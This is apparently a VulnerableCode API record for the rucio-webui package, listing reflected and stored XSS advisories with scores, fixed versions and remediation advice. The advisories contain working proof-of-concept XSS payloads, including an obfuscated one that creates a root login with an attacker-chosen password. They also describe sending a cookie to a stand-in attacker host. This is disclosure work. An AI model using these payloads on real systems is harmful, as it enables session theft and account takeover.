{"url":"http://public2.vulnerablecode.io/api/packages/935620?format=json","purl":"pkg:pypi/rucio-webui@1.25.3.post2","type":"pypi","namespace":"","name":"rucio-webui","version":"1.25.3.post2","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"35.8.3","latest_non_vulnerable_version":"39.3.1","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20271?format=json","vulnerability_id":"VCID-4n93-tux7-zubk","summary":"Rucio WebUI has a Reflected Cross-site Scripting Vulnerability\n### Summary\nA reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.\n\n#### Details\nThe WebUI error message renders `ExceptionMessage` (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in `common.py` - specifically `error_headers -> _error_response -> generate_http_error_flask`, which places `ExceptionMessage` into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in `lib/rucio/web/ui/static/*.js` such as `rule.js`, `request_rule.js`, `list_rules.js`) with `jQuery.html(...)` or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).\n\n### PoC\n1) Reflected XSS via account parameter (browse or load URL in WebUI context):\n```text\nhttps://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E\n```\nServer response (excerpt):\n```http\nHTTP/1.1 500 INTERNAL SERVER ERROR\nExceptionClass: AccountNotFound\nExceptionMessage: Account <img src=x onerror=alert(document.cookie)> does not exist\nContent-Type: application/octet-stream\n\n{\"ExceptionClass\":\"AccountNotFound\",\"ExceptionMessage\":\"Account <img src=x onerror=alert(document.cookie)> does not exist\"}\n```\n\n**XSS payload triggering (Displaying session token) when browsing to crafted URL**\n<img width=\"1210\" height=\"510\" alt=\"XSS payload triggering (Displaying session token) when browsing to crafted URL\" src=\"https://github.com/user-attachments/assets/989a0aed-628d-4f1c-bbfb-de434dab8af6\" />\n\nWhen the WebUI inserts `ExceptionMessage` into the page with `.html(...)`, the injected <img onerror=...> executes and displays the users' session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\n2) Reflected XSS via account key attribute creation error:\n```http\nPOST /proxy/accounts/pentest/attr/XSS HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nOrigin: https://127.0.0.1:8443\nX-Rucio-Script: webui::-ui-account\n{\"key\":\"XSS\",\"value\":\"<script>alert(document.cookie)</script>\"}\n```\n\n**XSS payload triggering (Displaying session token) on error when creating account key**\n<img width=\"1322\" height=\"593\" alt=\"XSS payload triggering (Displaying session token) on error when creating account key\" src=\"https://github.com/user-attachments/assets/151cb0ad-e4f0-498e-954e-be3455ca8a72\" />\n\nServer response (excerpt) contains `ExceptionMessage` with the raw `<script>` payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it's not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.\n\n### Impact\nAny authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.\n\nAttackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password. \n\n**Example URL to Create UserPass for Root**\n```\nhttps://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D'PUT'%3Bo.credentials%3D'include'%3Bo.headers%3D%7B'X-Rucio-Username'%3A'attackeruser'%2C'X-Rucio-Password'%3A'AttackerPassword123'%2C'X-Rucio-Email'%3A'demo%40example.org'%2C'X-Rucio-Auth-Token'%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B'identities'%2BString.fromCharCode(47)%2B'root'%2BString.fromCharCode(47)%2B'userpass'%2Co)%7D)()%3E\n```\n\n**Account Payload to Create UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n**Creating identity for Root account via reflected XSS**\n<img width=\"1558\" height=\"957\" alt=\"Creating identity for Root account via reflected XSS\" src=\"https://github.com/user-attachments/assets/539bfff4-70f3-42c5-b83a-10b5f85d6d44\" />\n\nAll WebUI users are impacted.\n\n### Remediation / Mitigation\nChange all client-side insertions of server-provided text from `.html(...)` to `.text()` or create text nodes / escape HTML before insertion. Example: replace `$('#elem').html(msg)` with `$('#elem').empty().append($('<span>').text(msg))`.\n\nAdditionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n#### References:\n- Server functions: `common.py` (`error_headers`, `_error_response, generate_http_error_flask`)\n- Example client files to fix: `lib/rucio/web/ui/static/rule.js`, `lib/rucio/web/ui/static/request_rule.js, list_rules.js`\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25136","reference_id":"","reference_type":"","scores":[{"value":"0.0008","scoring_system":"epss","scoring_elements":"0.23655","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25136"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-26T20:44:39Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25136","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25136"},{"reference_url":"https://github.com/advisories/GHSA-h79m-5jjm-jm4q","reference_id":"GHSA-h79m-5jjm-jm4q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h79m-5jjm-jm4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25136","GHSA-h79m-5jjm-jm4q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4n93-tux7-zubk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19870?format=json","vulnerability_id":"VCID-hme7-m816-77by","summary":"Rucio WebUI has a Stored Cross-site Scripting (XSS) Vulnerability in its Custom RSE Attribute\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom RSE Attribute of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA stored XSS payload can be introduced via a custom RSE attribute value and is later rendered when the RSE is viewed.\n\n**Create Path**:  \nAdmin > RSE Management > _RSE NAME_ > Add Attribute\n\n**Trigger Path**:  \nAdmin > RSE Management > _RSE NAME_\n\n**Request**\n```http\nPOST /proxy/rses/WEB1/attr/XSS HTTP/1.1\n...\n{\"value\":\"<script>alert('XSS')</script>\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS Payload in RSE Attribute**\n<img width=\"1234\" height=\"844\" alt=\"Storing XSS Payload in RSE Attribute\" src=\"https://github.com/user-attachments/assets/d10f58c2-8cea-43a9-bf7f-f94ef3d1fd81\" />\n\n**XSS Payload triggering when viewing RSE**\n<img width=\"1248\" height=\"949\" alt=\"XSS Payload triggering when viewing RSE\" src=\"https://github.com/user-attachments/assets/d536fac2-ab44-4cfb-b669-085a8c3db33e\" />\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25736","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25736"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-fq4f-4738-rqxm","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T15:59:14Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-fq4f-4738-rqxm"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25736","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25736"},{"reference_url":"https://github.com/advisories/GHSA-fq4f-4738-rqxm","reference_id":"GHSA-fq4f-4738-rqxm","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fq4f-4738-rqxm"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25736","GHSA-fq4f-4738-rqxm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hme7-m816-77by"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/20459?format=json","vulnerability_id":"VCID-hmz1-rk7c-pucw","summary":"Rucio WebUI Vulnerable to Stored Cross-site Scripting (XSS) through Custom Rule Function\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Custom Rules function of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nA malicious payload supplied in the `comment` field is stored by the backend. When the rule is later viewed or approved, the stored script executes in the WebUI origin.\n\n**Create Path**:  \nMonitoring > Subscriptions and Rules > Request New Rule > Options > Add Comment\n\n**Trigger Paths**:  \n- **User Trigger**: Monitoring > Subscriptions and Rules > Show My Rules > *RULE NAME*  \n  (`https://localhost:8443/ui/rule?rule_id=<RULE_ID>`)\n- **Admin Trigger**: Data Transfer (R2D2) > Approve Rules > *RULE NAME*\n\n**Create Request**\n```http\nPOST /proxy/rules/ HTTP/1.1\n...\n{\"dids\":[{\"scope\":\"test\",\"name\":\"dataset1\"}],\"account\":\"pentest\",\"ask_approval\":true,\"activity\":\"User Subscriptions\",\"rse_expression\":\"WEB1\",\"copies\":1,\"grouping\":\"DATASET\",\"lifetime\":15552000,\"comment\":\"<script>alert(document.cookie)</script>\",\"asynchronous\":false,\"notify\":\"N\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\n[\"c2d675c1979d4549b26eede3531a7e6a\"]\n```\n\n**Creating RSE with XSS payload in comment**\n<img width=\"1032\" height=\"667\" alt=\"Creating RSE with XSS payload in comment\" src=\"https://github.com/user-attachments/assets/00258839-5288-48ed-856c-30cfee19d3c4\" />\n\n**Reviewing rule creation requests**\n<img width=\"1201\" height=\"625\" alt=\"Reviewing rule creation requests\" src=\"https://github.com/user-attachments/assets/1b5fc7af-a664-42dc-a3d4-b00755fe2bd7\" />\n\n**XSS Payload triggering on rule review**\n<img width=\"1197\" height=\"417\" alt=\"XXS Payload triggering on rule review\" src=\"https://github.com/user-attachments/assets/463e843a-1e9e-492e-960f-7d3edac2fd1e\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25733","reference_id":"","reference_type":"","scores":[{"value":"0.00063","scoring_system":"epss","scoring_elements":"0.19924","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25733"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-rwj9-7j48-9f7q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25733","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25733"},{"reference_url":"https://github.com/advisories/GHSA-rwj9-7j48-9f7q","reference_id":"GHSA-rwj9-7j48-9f7q","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rwj9-7j48-9f7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25733","GHSA-rwj9-7j48-9f7q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-hmz1-rk7c-pucw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19947?format=json","vulnerability_id":"VCID-jtev-r8r4-vfd5","summary":"Rucio WebUI has Stored Cross-site Scripting (XSS) in RSE Metadata\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the RSE metadata of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nSeveral metadata fields accept arbitrary input which is stored and later rendered unsafely in the WebUI when the RSEs are listed in the RSE Management dashboard.\n\n**Create Path**:  \nAdmin > RSE Management\n\n**Trigger Paths**:  \nAdmin > RSE Management  \nAdmin > RSE Management > _RSE NAME_\n\n**Vulnerable Attributes**:  \nCity, Country_Name, ISP\n\n**Request**\n```http\nPOST /proxy/rses/XSSTEST HTTP/1.1\n...\n{\"city\":\"<script>alert('CITY XSS')</script>\",\"country_name\":\"<script>alert('COUNTRY XSS')</script>\",\"ISP\":\"<script>alert('ISP XSS')</script>\",\"deterministic\":false,\"volatile\":false,\"staging_area\":false}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Stored XSS payload triggering in RSE listing after adding XSS payload in metadata**\n<img width=\"1252\" height=\"624\" alt=\"Stored XSS payload triggering in RSE listing after adding XSS payload in metadata\" src=\"https://github.com/user-attachments/assets/6546fc95-0c81-4db7-9271-37b5d4bc8f47\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker 